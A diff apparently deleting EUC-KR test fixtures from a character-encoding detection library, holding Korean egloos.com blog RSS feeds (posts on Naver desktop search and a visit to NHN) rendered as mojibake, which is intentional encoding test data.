    - - <![CDATA[ ³׳ְּ¹צ ³»PC °ֻ»צ ¼­÷ס½÷ ¸®÷ה ]]> - http://xenix.egloos.com/1211612 - - ¹״¿¡¼­ ¸»¾¸ µו¸°´כ·־, ¾±׳ֱ¦ ³׳ְּ¹צ °£´דָ¸¿¡ ֲ¼®ַֿ°ם ¿װ½ְ´ֿ´. °£´דָ¸¿¡¼­ ¸מ°¡ֱצ ¼­÷ס½÷ ½ֳ¿¬ְ» ÷¸°ם »ף´חָק ¸¶ְ½¿¡ µו´ֲ ¼­÷ס½÷°¡ ְײ¾תֱצ¸¸ ÷¸¾ָ»ףְַ ְְּ¯·־ ִָ±ג¿¡´ֲ ³²±ז ¼צ°¡ ¾ר¾ת½ְ´ֿ´. ֱַֿצ¸¸, ¿ְ´ֳ(21ְֿ)ְ» ±גַ״ '³׳ְּ¹צ µ¿¿µ»ף °ֻ»צ ¼­÷ס½÷' ±מֱצ, °£´דָ¸¿¡¼­ ½ֳ¿¬ַ´ר ¸נµח ¼­÷ס½÷°¡ ¿ְְֲַ» ְַ¸¹ַ·־, °£´דָ¸¶§ ¸¶ְ½¿¡ µי¾ת´ר 'µ¥½÷ֵ©ֵ¾ °ֻ»צ ¼­÷ס½÷' ¸¦ ¼ׂ°³ַ״ ÷¼±מ ַױ´ֿ´.
    -
    -1. ³׳ְּ¹צ ֵר¹
    -
    -»ח½ַ ³׳ְּ¹צְַ ¼­÷ס½÷ֱ °¡ְו ±ֳ±ַ´ר °ְֽ÷ '³׳ְּ¹צ ֵר¹' ¿´´ֲµ¥, °£´דָ¸¿¡¼± ֵר¹¿¡ °ַׁ ¾נ±ְ÷ µיְ» ¼צ ¾ר¾ת½ְ´ֿ´. ´כ½ֵ, °£´דָ¸°¡ ³¡³×°ם ½ִ»ח ½ֳ°£¿¡ ֱק¿ר ÷׀µי²² ³ֱֽצ½ֳ '³׳ְּ¹צ ֵר¹ְַ ¾קµ¥ְֶּ®´ֲ °טָ¹ְּ ¾ר´ְ³ִ' ¶ף°ם ֱת¹®ְ» ְַֿ '°נ ¾קµ¥ְֶּ®°¡ ¿¹ֱ₪µַ¾מ ְײ´' °ם ¸»¾¸ ַֿ¼ּ´ֲµ¥ °£´דָ¸°¡ ³¡³×°ם µ¹¾ֶ¿ֲ ¹·־ ´ְ½³¯ 2.0 Beta ·־ ¾קµ¥ְֶּ®°¡ µַ¾ת´ץ±÷¿ה.

    2.0 Beta ¿¡¼­ ´«¿¡ ¶ח´ֲ ±ג´ְֹ÷ ¹·־ '¾ַ¼÷ִµו ¹«·ב ִ¡·ב' ±ג´ְֹװ´ֿ´.
    -
    ¿הֱע ÷¸¸י, ¾ַ¼÷ ִµו ִ¡·ב ֱַ·־±׳·¥ ¸¶ְתµµ ½÷ְִֶּ¿‏¾מ ָ­ µַ¾מ°¡°ם ְײ°ם, ´כ÷־÷׀ְַ ִ¡·ב ֱַ·־±׳·¥ְּ ְ¯·בָ­ µַ°םְײ´ֲ »ףָ²¿¡¼­ ְּ·± ±ג´ְַֹ ֳ°¡´ֲ ¸ֵ¿ל ָ¯¿µַׂ¸¸ ַױ´ֿ´.
    -
    -±׳ ¿¿¡µµ, Zoom ±ג´ֹ, ֶֻ¾ק ֲק´ ±ג´ֹµמ ´¾חַׁ ±ג´ְֹּ ֳ°¡ µַ¾תֱצ¸¸ ±׳·± ֳ°¡±ג´ְֹ÷ °ר½ִ ָ¨ֶהְֱּצ¿¡¼­ ָ®ְ־ַ״ ÷¸½ֳ±ג ¹¶ף¸ח, ¿©±ג¼­´ֲ 'µ¥½÷ֵ©ֵ¾ °ֻ»צ' ±ג´ֹ¿¡ ´כַ״¼­ ¾ֻ¾ֶ ÷¸°½ְ´ֿ´.
    -
    -2. ³»PC °ֻ»צ
    -
    -³»PC °ֻ»צ ±ג´ְֹּ¶ץ, ְ־ֵֽ³ְַ ¹®¼­¸¦ °ֻ»צַֿµם »ח¿כְְַ PC ¿¡ ֱ¸ְחַֿ´ֲ µ¥ְֵּֽ¸¦ ½±°ם ÷¸£°װ °ֻ»צַׂ ¼צ ְײµµ·ֿ µµ¿ֱֽײ´ֲ ¼­÷ס½÷ ְװ´ֿ´. ְ©µµ¿לְַ °ֻ»צ ±ג´ְֹּ ¿צ³« ´ְ¸®±ג ¶§¹®¿¡, ±ג÷» ְ©µµ¿ל °ֻ»צ ±ג´ְֹ» ´כֳ¼ַׂ ÷¸£°ם °­·ֲַׁ °ֻ»צ ±ג´ְֹ» ַ¿ה·־ ַ״¼­ ֵ÷»‎ַֿ°װµָ ¼­÷ס½÷ְּ¸ח ±¸±µמ ´¸¥ ¾קֳ¼¿¡¼­µµ µ¥½÷ֵ©ֵ¾ °ֻ»צ ¼­÷ס½÷¸¦ ֱצ¿רַֿ°ם ְײ½ְ´ֿ´.
    -
    -
    ¢ׁ ¾מ¶»°װ ÷¸£°װ °ֻ»צַֿ³× ?
    -
    -ְ©µµ¿לְַ ±ג÷» °ֻ»צ ±ג´ְֹ÷ ְִֶֿ¸םְ¸·־ °ֻ»צ ¹¿¡´ֲ ֱצ¿רֱַֿצ ¾½ְ´ֿ´. ֱַֿצ¸¸, µ¥½÷ֵ©ֵ¾ °ֻ»צ ¼­÷ס½÷¿¡¼­´ֲ 'ְִֶֿ¸ם °ֻ»צ', 'ֶת´ץְּ¸§ °ֻ»צ', '¹®¼­ְִֶֿ ³»¿כְ¸·־ °ֻ»צ', 'ְּ¸ְֿ °ֻ»צ' µמ ´¾חַׁ °ֻ»צ ±ג´ְֹ» ֱ¦°רַױ´ֿ´.
    -
    -±׳·¯¸י, ¿ײ ְ©µµ¿ל °ֻ»צְ÷ ´ְ¸®°ם ³»PC °ֻ»צְ÷ ÷¸¥°ֹ±מ. ֱ₪´הְ÷ ְ־µ¦½ּ(»צְ־)¿¡ ְײ½ְ´ֿ´. ְ©µµ¿לְַ ְִֶֿ °ֻ»צְ÷ »ח¿כְ°¡ °ֻ»צ¾מ¸¦ ְװ·ֲַֿ¸י ±׳¶§÷־ֵֽ ½ֳ½÷ֵ¿¡ ְײ´ֲ ְְִֶֿ» ַֿ³×ַֿ³× ֳ¼ֵ©ַ״ ¿רַֿ´ֲ ְְִֶֿ»ֳ£´ֲ ¹ז½ִ ְװ´ֿ´. ½±°װ ¸»ַֿ¸י ֳ¥¿¡¼­ ¿רַֿ´ֲ ´¾מ¸¦ ֳ£±ג ְ§ַ״ 1ֶהְֱּצ÷־ֵֽ ְַׁוְַׁו ³ׁ°°¡¸ח ֳ£´ֲ°ֽ°ת ÷ס½ֱַֿ´°ם ַׂ ¼צ ְײ½ְ´ֿ´.
    -
    -ֳ¥¿¡¼­´ֲ ¿רַֿ´ֲ ´¿רְ» ½±°װ ֳ£±ג ְ§ַ״ ¾ױ÷־÷׀¿¡ 'ֲק·' ¸¦ ֱ¦°רַֿ°ם, ¿רַֿ´ֲ ´¾מ¸¦ ½±°װ ֳ£±ג ְ§ַ״ ֳ¥ְַ µ÷־÷׀¿¡ ¾ִֶֻ÷× ָ₪ְ÷ °¡³×´ ¼רְ¸·־ '»צְ־' ְ» ֱ¦°רַױ´ֿ´. ְּ¿ֽ ¸¶ֲש°¡ֱצ·־ ³»PC °ֻ»צ ¼­÷ס½÷ ¿×½ֳ ֶ¯ֱ₪ַׁ °ר°£¿¡ '»צְ־' ְּ¶ף°ם ַֿ´ֲ µ¥ְֵּֽ¸¦ ¸¸µי¾מ ְתְוַ״ µ׃´ֿ´.
    -
    -ֱן, PC ¿¡ ¾מ¶² ³»¿כְַ ¾מ¶² ְְִֶּֿ ְײ´ֱֲצ¸¦ ¹ּ¸® ֱ¶»חַ״¼­ ֱ₪¸®ַ״ µ־°ם »ח¿כְ°¡ °ֻ»צ¾מ¸¦ ְװ·ְֲַ»¶§ ְּ '»צְ־ µ¥ְֵּֽ' ¿¡¼­ ֳ£¾ֶ¼­ ְ§ִ¡¸¦ ¾ֻ·ֱֱײ¹ַ·־ ÷¸¥ °ֻ»צְּ °¡´ַֹׁ °ְֽװ´ֿ´.

    -±׳·¸´÷¸´ֿ, ְּ ³»PC °ֻ»צ ¼­÷ס½÷´ֲ ֳ±ג ¼³ִ¡½ֳ '»צְ־ µ¥ְֵּֽ' ¸¦ ¸¸µו´ֲ ½ֳ°£ְּ ַ¿הַױ´ֿ´. ¶ַַׁ, »צְ־ µ¥ְֵּֽ¸¦ ´ ¸¸µי°ם ³­ ִָ¿¡´ֲ PCְַ ְִֶֿµיְּ ¾מ¶»°װ ÷¯ַֿ´ֱֲצ °¨½ֳַ״¼­ »צְ־ µ¥ְֵּֽ¸¦ ¼צֱ₪ַ״ֱײ´ֲ ֱַ·־±׳·¥ְּ ַ׳»ף ½ַַאµַ¾מ ְײ¾מ¾ ַױ´ֿ´.
    -
    ±׳·¡¼­, ½ֳ½÷ֵ ֶ®·¹ְּ¿¡ ְ§¿ֽ°°ְ÷ ¾ְְִֶּּ ַ׳»ף ³×ֵ¸³× ְײ°װ µַ¸ח, "NaverDesktop.exe" ְִֶֿ°ת, "NaverDesktopFilter.exe" ְְִֶּֿ ַ׳»ף ½ַַאµַ¾מ ְײ°װ µֻ´ֿ´.
    -
    ֶע»ף½ֳ¿¡´ֲ ְ§¿ֽ°°ְ÷ ¼צֱ״ְַ ¸®¼ׂ½÷¸¦ ֱ¡ְ¯ַֿ°װ µַ°ם,
    -
    »צְ־(=ְ־µ¦½ּ) ְ¾קְּ ֱרַאְֱֿ¶§´ֲ ְ§¿ֽ°°ְ÷ ֱ₪µµְַ ¸®¼ׂ½÷¸¦ ֱ¡ְ¯ַֿ°װ µֻ´ֿ´.
    -ְּ »צְ־ ְ¾ק½ֳ ¾ֶ¹«·¡µµ ½ֳ½÷ְֵּ ¹צ¹קְ־´´רֱצ ַֿ´ֲ ַצ»ףְּ ְײְ» ¼צ ְײ±ג ¶§¹®¿¡, ְ©µµ¿לְַ ָ­¸י÷¸ָ£±ג¿ֽ °°ְ÷ ¿ר¸®·־ »ח¿כְְַ PC °¡ ְֱֿ₪½ֳ°£ »ח¿כµֱַצ ¾°ם ְײְ»¶§ »צְ־ ְ¾קְ» ֱרַאַֿ´ֲ ¹ז½ִµµ °¡´ַֹױ´ֿ´.
    -
    ¹°·׀, ֱצ± ֱן½ֳ »צְ־, ְֳ¼ ´½ֳ»צְ־ µמְַ ¹ז¹‎µµ ֱצ¿ר ַױ´ֿ´.
    -
    -3. °ֻ»צ ¹ז¹‎
    -
    -°ֻ»צ ְ־ֵֶֽהְּ½÷´ֲ ְ¥»ףְַ ³׳ְּ¹צ¿ֽ ¸ֵ¿ל ÷ס½ֱַױ´ֿ´. »ח¿כְְַ PC ¿¡ ¹ּ´ֿ ְ¥¼­¹צ°¡ °¡µ¿µַ¸ח, ַ״´ח ְ¥¼­¹צ¿¡¼­ °ֻ»צ ¿£ֱרְּ ְµ¿µֻ´ֿ´. ֶ®·¹ְְַּ '³»PC °ֻ»צ' ¾ְְִֶּ» ´ץ÷םֵ¬¸¯ ַֿ°ֵ³× ³׳ְּ¹צ ֵר¹ְַ ¾ְְִֶּ» ´©¸£¸י °ֻ»צ ¼­÷ס½÷¸¦ ְּ¿כַׂ ¼צ ְײ½ְ´ֿ´.
    -
    °ֻ»צ ָ­¸יְ÷ ְ§¿ֽ °°½ְ´ֿ´. °ֻ»צֳ¢ְּ ֱ¾׃¿¡ ³×ֵ¸³×°ם, ¾ֶ·¡ְֲ¸·־ ֳײ± ¿¢¼¼½÷ַׁ ְִֶֿ ¸ס·ֿ°ת ֶת´ץ ¸ס·ְּֿ ַ¥½ֳµֻ´ֿ´.
    -
    °ֻ»צ¾מ¸¦ ְװ·ֲַֿ¸י ְ§¿ֽ °°ְּ ֳײ± ¿¢¼¼½÷ַׁ ְ¥ ָק½÷ֵה¸®, ¹®¼­, ְּ¹ֱּצ, ְ½¾ַ, ֶת´ץ µמ¿¡¼­ °ֻ»צ¾מ¿ֽ °·ְֳײ´ֲ ְ·ב¸¦ ֳ£¾ֶ ÷¸¿©ֱ´ֿ´. ְּ¶§, ¹®¼­ ְְִֶַֿ °ז¿ל´ֲ ¹®¼­ְַ ְִֶֿ¸ם »׃¸¸ ¾ֶ´ֿ¶ף ¹®¼­ ¼׃ְַ ³»¿כ±מֱצ °ֻ»צַ״¼­ °·ֳ ְ·ב¸¦ ֳ£¾ֶ ֱ´ֿ´. ¸¸¾א, ¾ֶ¿פ·טְ» E-Mail ֵ¬¶ףְּ¾נֶ®·־ »ח¿כַֿ°ם ְײ´¸י ¾ֶ¿פ·טְַ E-Mail µ¥ְֵּֽ±מֱצµµ °ֻ»צְּ °¡´ַֹױ´ֿ´.
    -
    -ַׁ°¡ֱצ ְח¹ְּײ´ֲ ±ג´ְֹּ ¹·־ ְ§¿¡ ÷׃ְ÷ »ח°¢ְַ¸·־ ַ¥½ֳַׁ 'ֶת´ץ¿­±ג' ±ג´ְֹ־µ¥, ַ״´ח ְְִֶּֿ ְײ´ֲ ֶת´ץ¸¸ ¿­¾מֱײ´ֲ °ְּֽ ¾ֶ´ֿ¶ף ֶת´ץ¸¦ ¿­¾מֱ״ ִָ¿¡ ַ״´ח ְִֶֿ¿¡ ֶקִ¿½÷¸¦ ¸ֲֳח ֱ´ֿ´.
    -
    »ף´חָק ְְ÷ ±ג´ְֱֹּצ¸¸, ְִֶֿ ¼צ°¡ ¸¹ְ÷ ֶת´ץ¸¦ ¿­¾תְ»¶§ ¸ֵ¿ל ְ¯¿כַױ´ֿ´.
    -
    ַצְח PC ¿¡ ¹®¼­, ְ½¾ַ, ְּ¹ֱּצµמְַ °¢ ְ·בְַ °¹¼צ¸¦ ÷¼ ¼צ ְײ´ֲ ¸´÷µµ ֱ¦°רַױ´ֿ´.
    -
    -4. ÷¸¾ָ ±ג´ֹ
    -
    -
    ´¼צְַ ְ¯ְת°¡ ַׁ PC¸¦ ְּ¿כַׂ °ז¿ל¸¦ ´כ÷סַ״ ֱַ¶ףְּ¹צ½ֳ ÷¸ָ£¿ֽ, ÷¸¾ְָ» ְ§ַ״ ÷¸¾ָ ±ג´ְֹ» ֱ¦°רַױ´ֿ´. ְּ°ק¿¡ µמ·ַֿׁ ֶת´ץ´ֲ »צְ־µֱַצ ¾½ְ´ֿ´. ¹°·׀, »צְ־µֱַצ ¾ְ¸¹ַ·־ °ֻ»צ °ב°ת¿¡µµ ³כֳגµֱַצ ¾½ְ´ֿ´.
    -
    ¶ַַׁ, °ֻ»צ ְֳ¼¸¦ ֱ¦ַַֿׁ´ֲ ±ג´ֹµµ ֱ¦°רַױ´ֿ´. °ֻ»צ ֱ¦ַׁ ±ג´ְֹ» »ח¿כַֿ¸י °ֻ»צ½ֳ ֶ׀½÷¿צµו°¡ ַ¿הַֿ°װ µֻ´ֿ´.
    -
    -5. ֵ½»צ±ג¿ֽ ¿¬µ¿
    -
    ¿רַֿ´ֲ ֶת´ץ¿¡¼­ ¿ְ¸¥ֲ ¹צֶ°ְ» ´©¸£¸י ַ״´ח ֶת´ץ ³»¿¡¼­¸¸ °ֻ»צְּ °¡´ֹ ַױ´ֿ´.
    -
    ְּ÷־÷׀ְּ °¡ְו ¸¶ְ½¿¡ µו´ֲ ±ג´ְֹ־µ¥, ְ©µµ¿ל¿כ ֱַ·־±׳·¥¿¡¼­ '¿­±ג' ¸´÷¸¦ ¼±ֳֵַֿ¸י ְ§¿ֽ°°ְ÷ °ֻ»צֳ¢ְּ ³×ֵ¸³×¼­ ֶת´ץ¸¦ ֳ£¾ֶ°¡ֱצ ¾¾ֶµµ ְִֶֿ¸םְַ ְֿ÷־ ¶ַ´ֲ ³»¿כְַ ְֿ÷־¸¸ ¾ֻ°ם ְײ´¸י ¹·־ ¿­±ג°¡ °¡´ֹ ַױ´ֿ´.
    -
    -6. ¸¶ִ¡¸ח
    -
    -¿ר·¡ °£´ַׁ »ח¿כ±ג¸¸ ³²±ז »‎°¢ ְּ¾ת´ֲµ¥ ְ´÷¸´ֿ ¿ְֿ ¸®÷ה°¡ µַ¾מ ¹צ·ָ½ְ´ֿ´. 'µ¥½÷ֵ©ֵ¾ °ֻ»צ ¼­÷ס½÷' ´ֲ ¼צ¹י±ג°¡¿¡ ְּ¸£´ֲ ַֿµוµנ½÷ֵ©¸¦ »ח¿כַֿ´ֲ ¿הֱע, ַֿµוµנ½÷ֵ© ¿כ·®ְּ ֱ¡ֱ¡ ´ֳ¾מ³×°ם ְײ´ֲ ¿הֱע ¸ֵ¿ל ְ¯¿כַׁ ¼­÷ס½÷ֱ ַֿ³× ְװ´ֿ´. ±׳ ֱ¿¡¼­µµ ³׳ְּ¹צְַ '³» PC °ֻ»צ' ¼­÷ס½÷´ֲ ³׳ְּ¹צ ֶ¯ְ¯ְַ ±ע²ַׁ ְ־ֵֶֽהְּ½÷¿ֽ, ¾ֱֶק ÷£ֵ¸ְ׃¿¡µµ ÷ׂ±¸ַֿ°ם ²ֿ³× ִטְַׁ ±¸µ¿ְ» ÷¸¿©ֱ´ֿ´.
    -
    -°ֵ±ג¿¡, ±׳°£ µ¥½÷ֵ©ֵ¾ °ֻ»צ ¼­÷ס½÷¿¡¼­ ֵ©°װ ½ֵ°זְ» ¾²ֱצ ¾´ר '÷¸¾ָ' °ת °·ֳµָ ±ג´ְֹּ ֳ°¡µַ¾מ ְײ°ם, ¸ֵ¿ל ְ¯¿כַׁ '¿­±ג' ¸´÷¿¡ °ֻ»צ±ג´ֹ ¿¬µ¿±מֱצ ֱ¦°רַֿ°ם ְײ½ְ´ֿ´. ַׁ¹רְּ¶ףµµ ְ©µµ¿לְַ ±ג÷» °ֻ»צ ±ג´ְֹ» ְּ¿כַֿ¸י¼­ ´ה´הַװְ» ´ְ²¸÷» ְ¯ְת¶ף¸י. ֱ¾ֱ¾ ³»°¡ ¸¸µי¾מµ׀ µ¥ְֵּֽ³× ְְִֶּֿ ¾מµנְײ´ֱֲצ »‎°¢ְּ ³×ֱצ ¾´ֲ ְ¯ְת¶ף¸י ²ְ ַׁ¹ר ¼³ִ¡ַ״ ÷¼¸¸ַׁ ֱַ·־±׳·¥ְ־°ֽ °°½ְ´ֿ´.
    - - ]]> -
    - ¢ֶ ִֶ¿צְ¯ְתְ »ח°ם ¢ֶ - Tue, 20 Dec 2005 19:08:09 GMT -
    - - <![CDATA[ ³׳ְּ¹צ ÷ם·־°ֵ °£´דָ¸ ִָ±ג ]]> - http://xenix.egloos.com/1209366 - - -nhn ÷»»ח°¡ ¿ר·¡ ½÷ֵ¸ֵ¸¿צ¿¡ ְײ´°¡, ֱצ±ְ÷ ÷׀´ח¿¡ »ח¿ְֱ» ֱ‏°ם ְײ°ם »ח¿ְֱ» ֱ‏´ֲ µ¿¾ָ ÷׀´ח SK C&C °ַ¹°¿¡¼­ 10°³ ֳ‏ְ» »ח¿כַֿ°ם ְײ´°ם ַֿ´ץ±÷¿ה.
    -
    -ְת´ֲ ¾ֶ½ֳ´ ½ְּֽ ְ־ֳµ¿¡ »ל°ם ְײ´ֲµ¥.... ¸ײ´ץ±÷¿ה ₪» °­³²±מֱצ °¡¼­ °­³²¿¡¼­ nhn ¿¡¼­ ֱ¦°רַ״ ֱײ½ֵ ¼ֵֶ² ¹צ½÷¸¦ ֵ¸°ם ÷׀´ח nhn ÷»»ח ±מֱצ ְּµ¿ ַ½ְ´ֿ´.
    -
    -nhn ³»÷־¸¦ ֳ³ְ½ ÷» ¼ׂ°¨ְ÷, 'ֱֱ´' ¿´½ְ´ֿ´.; ְװ±¸¿¡ ֵ©¸®½÷¸¶½÷ ÷׀ְ§±ג·־ ¸ֱצ°װ ְו½ִµµ µַ¾מ ְײ¾ת°ם, ָ¸»ח ¾ָ¿¡ ִ«ֶה°°ְ÷ °ר°£µµ ¸¶·ֳ µַ¾מ ְײ´ץ±÷¿ה.
    -
    ְװ±¸ ¿ְ¸¥ֲ¿¡´ֲ ְּ·¸°װ ½ַ½ֳ°£ְ¸·־ ¸נ´ֵֽֿ ¸מ°³¿¡¼­ °ֻ»צ¾מ°¡ ³×¿ְ°ם ְײ´ֲ ¸נ½ְְּ ½ֵ¼± ַ½ְ´ֿ´. °ֻ»צ¾מ°¡ ֱ₪¸» ֱ₪½ֵ¾רְּ °»½ֵ µַ°ם ְײ´ץ±÷¿ה. (ְֿ °ֻ»צ 2ֳµ¸¸°ַ, ְ¯´ֵֿ© °ֻ»צ¾מ°¡ 60¸¸°³ ¼צֱ״ ְּ¶ף°ם ַױ´ֿ´. ֱ₪¸» ¾מ¸¶¾מ¸¶ ֱַֿׂ..;)
    -
    ְּ·¸°װ ¸¶·ֳµָ ָ¸ְַ½ַ¿¡¼­ °£´דָ¸¸¦ ֱרַא ַ½ְ´ֿ´. ¹ִּ£÷´¾ֶ¸®´װ, ¼­¸ם´צ ±גְ´װ, ±טֱֲֵ´װ, CN´װ, ¹׀ְַַ¯´װ, oojoo´װ, °ִֵ£ ¸¶·ח´װ ±׳¸®°ם ְת ְּ·¸°װ ְֿ°צ¸םְַ ÷ם·־°ֵ°¡ ֲ¿©ַ°ם, »חֱר¿¡¼­ ÷¸½ֳ¸י ¾ֶ½ֳ°ֱצ¸¸ nhn ְֲַ ÷»÷־ְו´װ ÷־ֵֽ ַ״¼­, °¢ֱ¾ ½ַ¹« °³¹ְ, ±גָ¹ְ ÷׀µי¿¡ ֱרַא ½÷ֵַ ÷׀µי±מֱצ ²ֿ³× ¸¹ְ÷ ÷׀µי²²¼­ ְ¸® ַֿ¼ֵ¼­, ֳ³ְ½ µי¾מ°¥¶§ ֱ» ³מ¶ת½ְ´ֿ´.;;
    -(»ח½ַ ֵ¸ְֶּ²¸¸ °£´דָ¸°ם, ±׳³ֹ FGI ַ½ְִַ ְְ÷ ¸נְ׃ְ» »‎°¢ַֿ°ם °¬¾ת°ֵµח¿ה..)
    -
    -±׳µ, ³׳ְּ¹צְַ ½ֵ±װ ¼­÷ס½÷¿ֽ ַצֱ¸ ¼­÷ס½÷µמ¿¡ °ַ״ ¿©·¯°¡ֱצ ְּ¾±ג¸¦ µט°ם, ¼­÷ס½÷µי¿¡ °ַׁ ¾ך±גµיְ» ³×´©´ֲ ½ֳ°£ְּ ְּ¾מֱ³½ְ´ֿ´. (¿©±ג¼± °³ְ־ְְ¸·־ ֱ» ¾ף¶³¶³ַֿ°ם µµַׁ ÷׀ְ§±ג¶ף ֱ¦´כ·־ ¹÷°¡ ְַ°ְ» ¸רµו¸®°ם ¿ֲ°ֵ °°¾ֶ ֱ» ֱֻ¼ַׁ ¸¶ְ½µµ µי°ם ±׳·¯³׳¿ה..;)
    -
    ±׳ µ ½ִ»ח ½ֳ°£ְּ ְּ¾מֱ³°ם, »ח³»¿¡ ְײ´ֲ ִ«ֶה°°ְ÷ °ר°£¿¡¼­ ֳגְו ÷־ֶה·־ ְת³ב ½ִ»ח¸¦ ַ½ְ´ֿ´.
    -½ִ»ח´ֲ »ף´חָק ְװ¸ְ¿¡ ְ ¸ֲ¾ׂ±¸¿ה, »ח³» ִ«ֶה¿¡¼­ ֱ¦°רַ״ ֱײ½ֵ ְ½·בµי (ֱך½÷¿ֽ ¿רµ־ִ¿ַַ) µµ ¸ְְײ¾ת ½ְ´ֿ´.
    -(ְּ »ח³» ִ«ֶה¿¡¼­´ֲ ¿ר·¡ »ח¿רµי¿¡°װ ¿רµ־ִ¿ַַ¸¦ 500¿ר, ¶ַ ´¸¥ ִ¿ַַ¸¦ (¹¹´ץ¶ף..) 700¿ר¿¡ ֶָ°ם ְײ´ֲµ¥ ¼צְֽ±ְ» ְ¾׳ ÷ׂ¿לְּ¿פ µ½±ג¿¡ »ח¿כַׁ´°ם ַױ´ֿ´. »ח¿רְּ 1,000¸םֱ₪µµ µַ´ֿ±מ, ¼צְֽ±µµ »ף´חַׁ ±װ¸נ°ֱׂ..)
    -
    ³×¿ֳ¶§´ֲ ְּ·± ±ג³הַ°µי ±מֱצ ֳ¬° ֱײ½ֳ´ץ±÷¿ה. ¿¹» ³׳ְּ¹צ ¸נְ ¸נ¾ח ַµוֶשֱ°ת VGA± ְ¥ִ· ְּ¾ת½ְ´ֿ´.
    -
    ±׳¸®°ם ְּ°ַ ½÷ֶה¼ָ ¾ְֵֶּ. ¼צ·®ְּ ¾ר¾מ¼­ ֱק¿רµיµµ ְ ¸ר¹´ֲ ·¹¾מ ¾ְֵֶּ ְּ¶ף°ם ַֿ½ֳ´ץ±÷¿ה. ³׳ְּ¹צ CF ¿¡¼­ ְֱצַצְּ ¾²°ם³×¿װ´ר ¹·־ ±׳ ³¯°³´¸° ³׳ְּ¹צ ¸נְ ְװ´ֿ´.
    -
    -ְּ¹ר °£´דָ¸ְַ ´ְ³¦ְ÷, ְֿ´ °£´דָ¸ ְֳ¼·־¸¸ ÷»´¸י ֱ״÷ס´ֲ ¸¹ְּ ַֿ½ֵµם ַ´ֲµ¥ ֳ³ְ½ ַ״÷¸½ֳ´ֲ°ֵ¶ף ±׳·±ֱצ ֱ» ¾מ»צַ״ ַֿ½ֳ´ֲ°ֽ °°±גµµ ַֿ°ם ְֳ¼ְְ־ µµַׁ ÷׀ְ§±ג ¶§¹®¿¡ ָ°¹ָק ְַ°ְ» ֱ¦½ֳַׂ ¸¸ַׁ ְ¸®´ֲ ¾ֶ´ֿ¾ת´רµם ַױ´ֿ´.
    -
    -ֱַֿצ¸¸, °£´דָ¸ְַ ¸סְְּ °£´דָ¸¿¡¸¸ ְײ´ֲ°ְּֽ ¾ֶ´ֿ¶ף°ם ¸»¾¸ ַֿ½ֵ °ֳֽ³·³ ±׳°£ ְ »ח¿כַ״÷¸ֱצ ¾¾ׂ´ר ³׳ְּ¹צְַ ´¾חַׁ ¼­÷ס½÷µיְ» ְ¼¼ָק ֳ¼ַטַׂ ¼צ ְײ´ֲ ְ¸®¿´°ם, ±׳ֱ¿£ ֱ₪¸» ±¦ֲתְ÷ ¼­÷ס½÷µµ ְײ¾ת½ְ´ֿ´. ¶ַַׁ, ±׳°£ ³׳ְּ¹צ°¡ 1ְ§ ±ג¾קְּ¾מ¼­ °®°ם ְײ´ר ¿״ֱצ ¸נ¸¦ °ֵ÷־°¨°ת µµַ״ ÷¸ְ־´´ֲ ´ְ³¦ְּ ¸¹ְּ »ח¶ףֱ³°ם ָ¸»ח ְּ¹ֱּצ¿¡ »ף´חָק ְֱֱ÷ ´ְ³¦ְ» ¹°ם ¿ֲ ְ¸® ¿´½ְ´ֿ´.
    -
    -ְֱֱ÷ ְ¸®¿¡ ֳ´כַ״ֱײ½ֵ nhn ¿©·¯÷׀²² °¨»ח µו¸®°ם,
    -±׳³¯ ¸¸³×÷ָ ÷ם·־°ֵ ¿©·¯÷׀µי ֱ₪¸» ¹°¡¿½ְ´ֿ´. : )

    nhn ¿¡¼­ ֲן¾מֱײ½ֵ ´ֳ¼ »חֱר°ת °ֵ±ג¼­ ֳֳג(?)ַׁ ֱ¦ »חֱרµי ְװ´ֿ´.₪»
    -÷ם·־±׳¿¡ ¹י¸¸³ג¸¸¿¡ °ר°³ַֿ´ֲ ֱ¦ »חֱרְּ±÷¿ה..; - ]]> -
    - ¢ֶ ם»ח°ם ¢ֶ - Sun, 18 Dec 2005 10:53:17 GMT -
    -
    -
    diff --git a/chardet/tests/EUC-KR/yunho.egloos.com.xml b/chardet/tests/EUC-KR/yunho.egloos.com.xml deleted file mode 100644 index 5e3bb25..0000000 --- a/chardet/tests/EUC-KR/yunho.egloos.com.xml +++ /dev/null @@ -1,203 +0,0 @@ - - - - - Alphageek - http://yunho.egloos.com - Real Engineers know that Halloween is really the same as Christmas, because OCT 31 = DEC 25. - ko - Sat, 10 Apr 2004 08:34:54 GMT - - Alphageek - http://pds.egloos.com/logo/1/200404/10/04/b0000704.jpg - http://yunho.egloos.com - 80 - 94 - Real Engineers know that Halloween is really the same as Christmas, because OCT 31 = DEC 25. - - - <![CDATA[ ְ¥ְַ ְֱּ¼÷ ]]> - http://yunho.egloos.com/2070645 - - -
    ְ¥ְ÷ ÷׀¸ם "Web as hypertext system"ְ¸·־ ½ְֳµַ¾תֱצ¸¸, ³¹«³×µµ ¼÷°רְְּ¾ת°ם ´¸¥ ְְ‎ַׁ ´כ¾ְָּ ¾ר¾ת±ג¿¡ ֳ³ְ½÷־ֵֽ "Web as [remote] software interface"·־µµ »ח¿כµַ°װ µַ¾ת´.  AJAX °°ְ÷ ±ג¼תְּ °¢±₪ְ» ¹ְ¸¸י¼­µµ µ¿½ֳ¿¡ ³ם¶ץְַ ´כ»ףְּ µַ´ֲ °ְֽ÷ ְּ·¯ַׁ software interface·־¼­ְַ ¿×ַׂ°ת hypertext systemְ¸·־¼­ְַ ¿ה±¸»חַ׳ְּ ַ׳»ף ְִֿ¡ֱַֿצ¸¸ְ÷ ¾±ג ¶§¹®ְּ´.  »ח½ַ software interface·־¼­ְַ ְ¥ְ÷ °בִ ָ¿ְ²ְְּ¶ף´ר°¡ ְְ‎ַׁ ¾ֵֶ°ֵ״ֳִ¶ף°ם ¾ך±גַֿ±ג ¾מ·ֶ´.  ֱַֿצ¸¸ ¸נµח °ְּֽ ְ־ֵֽ³°ת ¿¬°בµַ¾מ¾ ַ´ר ±׳ ½ֱֳ¡¿¡ °ת¿¬ ´כ¾ְָּ ְײ¾ת´ר°¡.  ְּ¸¦ JavaScript·־, Java Appletְ¸·־, Flash·־, ActiveX·־ ÷¸¿ַֿ״÷¸·ֱ ְַ¸³× ¸¸ֱ·½÷·´ֱצ ¾¾ׂ°ם ֱצ±ְ÷ AJAX°¡ ´כ¾ֳָ³·³ ÷¸ְֱּצ¸¸ ³»°¡ ÷¸±ג¿£ software interface·־¼­ְַ ְ¥ְַ ¼צ¸םְ» ¾א°£ ¿¬ְו½ֳֵ² °ְֽֿ »׃ְּ´. 
    -
